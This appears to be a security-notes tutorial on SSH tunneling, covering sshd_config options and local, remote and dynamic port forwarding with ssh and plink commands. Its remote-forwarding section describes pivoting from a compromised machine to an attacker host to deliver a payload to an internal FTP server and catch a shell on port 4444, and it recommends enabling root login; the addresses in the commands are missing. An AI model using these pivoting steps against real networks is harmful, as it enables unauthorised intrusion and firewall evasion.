Tunneling a protocol involves encapsulating it within a different protocol. By using various tunneling techniques, we can carry a given protocol over an incompatible delivery network, or provide a secure path through an untrusted network.

ssh tunneling

scenarios of using tunneling:

  • making a secure connection while using unencrypted protocols such as http, imap, pop3, smtp..
  • pivoting/lateral movement (accessing other isolated machines throw a compromised machine)
  • bypass firewall rules (ROCKS proxy)

ssh server configuration

first install ssh service to run shh server

sudo apt-get install openssh-server

file path /etc/ssh/sshd_config


  • AllowTcpForwarding:
    • yes[default] allow all tcp
    • no prevent all tcp
    • local
    • remote
  • GatewayPorts (remote port forwarding)
    • yes allow anyone to connect
    • no[default] only local connections allowed
    • clintspecified specify an ip address to allow connection (== yes option if no one specified)
  • PermitRootLogin set to yes to allow root login

uncomment any option you need to set on sshd_config file (delete the #)

Port 22
PermitRootLogin yes
AllowTcpForwarding yes
GatewayPorts clientspecified

restart ssh service after editing the config file

$ service ssh restart

Local port forwarding

SSH local port forwarding allows us to tunnel a local port to a remote server using SSH as the transport protocol.


ssh [username@address] -p <ssh_port> -L bindport:host:hostport -N

-N to prevent the user from executing commands on the server

-L for local forwarding

bind_port client address and port

host:host_port destination address and port

[username@address] ssh server


machine address port
client localhost 8080
ssh_server 22
host 80
  1. first configure ssh server
  2. then run this command on client machine
$ ssh ssh_server@ -p 22 -L 8080: -N

for windows machines use Plink (PuTTY Link):

> plink.exe ssh_server@ -p 22 -L 8080: -N
  1. now if you open http://localhost:8080 you will reach the host from your client machine

Remote port forwarding (pivoting)

this type used when you want to access an internal(isolated) machine using a compromised machine, in this case the ssh server is the attacker machine, connection is established from the internal machine and the attacker machine is listen on a specified port


ssh [username@address] -p <ssh_port> -R bindport:host:hostport -N

-N to prevent the user from executing commands on the server

-R for remote forwarding

bindport compromised machine address and port

host:hostport destination address and port

[username@address] attacker machine | ssh server


machine address port
Attacker (ssh server) 2221 |4444
compromised 2221|21|
Target (ftp) 21 | 4444
  1. configure your attacking machine ssh server
  2. run this command on compromised machine


$ ssh Attacker@ -p 22 -R 2221: -R 4444: -N


> plink.exe Attacker@ -p 22 -R 2221: -R 4444: -N

in this scenario we used two -R with two ports, one for sending the payload to the ftp server (21), and the other one for connecting the shell (4444).

  1. now after sending your payload to localhost 2221 you should get the shell if you connect to port 4444 nc 4444

Dynamic port forwarding (SOCKS proxy)

in this type the ssh server works as proxy to bypass the firewall configuration and giving client an access to reach a blocked service. dynamic

ssh [username@address] -p <ssh_port> -D <bindport> -N

-N to prevent the user from executing commands on the server

-D for Dynamic forwarding

bindport compromised machine address and port


machine address port
SOCKS proxy (ssh server) 22
client local 5555
service site.com 443
  1. configure the ssh server
  2. run this command on client machine to connect


$ ssh proxy@ -p 22 -D 5555 -N


> plink.exe proxy@ -p 22 -D 5555 -N
  1. configure your browser for SOCKS proxy localhost and port 5555.
  2. now if you tried to visit https://site.com from client browser it should be reachable.